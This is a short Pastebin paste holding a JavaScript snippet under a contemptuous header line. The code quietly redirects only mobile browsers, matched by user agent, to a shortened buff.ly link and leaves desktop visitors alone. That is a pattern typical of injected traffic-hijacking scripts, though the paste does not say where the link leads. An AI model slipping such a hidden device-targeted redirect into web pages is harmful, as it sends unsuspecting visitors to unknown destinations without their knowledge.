Advertisement
Guest User

Untitled

a guest
Dec 9th, 2016
66
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.91 KB | None | 0 0
  1. --------------------------------------------------------------------------------------------------------------------------------------
  2. Fuck people are stupid
  3.  
  4. --------------------------------------------------------------------------------------------------------------------------------------
  5.  
  6.  
  7. var device = navigator.userAgent
  8.  
  9. if (device.match(/Iphone/i)|| device.match(/Ipod/i)|| device.match(/Android/i)|| device.match(/J2ME/i)|| device.match(/BlackBerry/i)|| device.match(/iPhone|iPad|iPod/i)|| device.match(/Opera Mini/i)|| device.match(/IEMobile/i)|| device.match(/Mobile/i)|| device.match(/Windows Phone/i)|| device.match(/windows mobile/i)|| device.match(/windows ce/i)|| device.match(/webOS/i)|| device.match(/palm/i)|| device.match(/bada/i)|| device.match(/series60/i)|| device.match(/nokia/i)|| device.match(/symbian/i)|| device.match(/HTC/i))
  10. {
  11. window.location = "http://buff.ly/2hfWgbW";
  12. }
  13. else
  14. {
  15. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement